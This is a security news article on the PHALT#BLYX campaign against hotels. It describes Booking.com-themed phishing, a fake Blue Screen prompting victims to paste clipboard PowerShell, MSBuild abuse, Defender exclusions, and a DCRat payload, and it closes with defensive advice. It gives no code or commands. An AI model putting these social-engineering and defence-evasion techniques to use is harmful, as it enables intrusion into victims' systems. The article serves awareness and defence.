The ClickFix Trap: PHALT#BLYX Uses Fake BSODs to Hijack Hotel Systems

Notifications regarding Booking.com cancellations involving substantial financial transactions appear as mere routine for hospitality providers. Yet, such correspondence serves as the harbinger for a sophisticated malicious campaign tracked by Securonix researchers under the moniker PHALT#BLYX. This operation exemplifies a burgeoning trend where cyberattacks prioritize psychological manipulation and the exploitation of trusted Windows utilities over traditional technical vulnerabilities.

The offensive specifically targets the hospitality sector, experiencing a surge during the peak holiday season. Victims receive spear-phishing missives concerning purported booking cancellations with payment details denominated in Euros. This artifice fabricates a sense of exigency, compelling the recipient to engage with the provided hyperlink. Instead of the legitimate Booking.com portal, the user is rerouted to a meticulously crafted facsimile, where the aesthetic fidelity—logos, typography, and color palettes—is virtually indistinguishable from the authentic site.

Upon the fraudulent landing page, the victim encounters a simulated loading error and is prompted to refresh the interface. This interaction triggers a full-screen browser mode that mimics the notorious Windows “Blue Screen of Death” (BSOD). Amidst this heightened stress, the user is offered a simplistic remedy: invoke the “Run” dialog, paste a pre-copied command, and execute it. In reality, a malicious PowerShell script has already been surreptitiously placed within the system clipboard. Consequently, the user unwittingly initiates the infection, bypassing numerous automated security perimeters.

The assault subsequently unfolds in multiple echelons. The PowerShell script fetches a specialized MSBuild project file and executes it via the native Microsoft build engine. This maneuver is a quintessential “Living off the Land” (LotL) technique; by utilizing a trusted system binary, the attack assumes a veneer of legitimacy that often evades antivirus signatures and application control policies. As a diversionary tactic, the legitimate Booking.com administrative portal is opened in the browser to assuage any lingering suspicions.

The ingested MSBuild project contains embedded code designed to erode the system’s defenses. It systematically adds exclusions to Windows Defender for critical directories and file types, and should administrative privileges be available, it completely deactivates real-time protection. If such privileges are absent, the malware incessantly triggers User Account Control (UAC) prompts, banking on the victim’s eventual capitulation to silence the intrusive pop-ups.

The definitive payload is a modified iteration of DCRat, a remote access tool deeply entrenched within the Russian-speaking cybercriminal underground. It establishes persistent access by injecting itself into legitimate Windows processes, intercepting keystrokes, exfiltrating system telemetry, and deploying supplementary modules such as cryptocurrency miners. To maintain persistence, the malware utilizes an unorthodox method: placing .url shortcuts within the startup folder that point to local malicious executables.

Researchers have noted the presence of Russian linguistic markers within the debug strings and service metadata of the code. The grammatical precision suggests the involvement of native speakers or the utilization of sophisticated toolkits sourced from clandestine forums. This observation aligns with the selection of DCRat, a staple in that specific criminal ecosystem.

The PHALT#BLYX campaign underscores the lethal synergy between social engineering and LotL methodologies. In these scenarios, traditional signature-based defenses frequently prove inadequate, shifting the burden of security onto user behavior. Experts advise rigorous staff training, a healthy skepticism toward urgent financial communications, and vigilant monitoring of atypical activity within system utilities like MSBuild. In the modern threat landscape, the genesis of a catastrophic security breach is often concealed within these seemingly mundane details.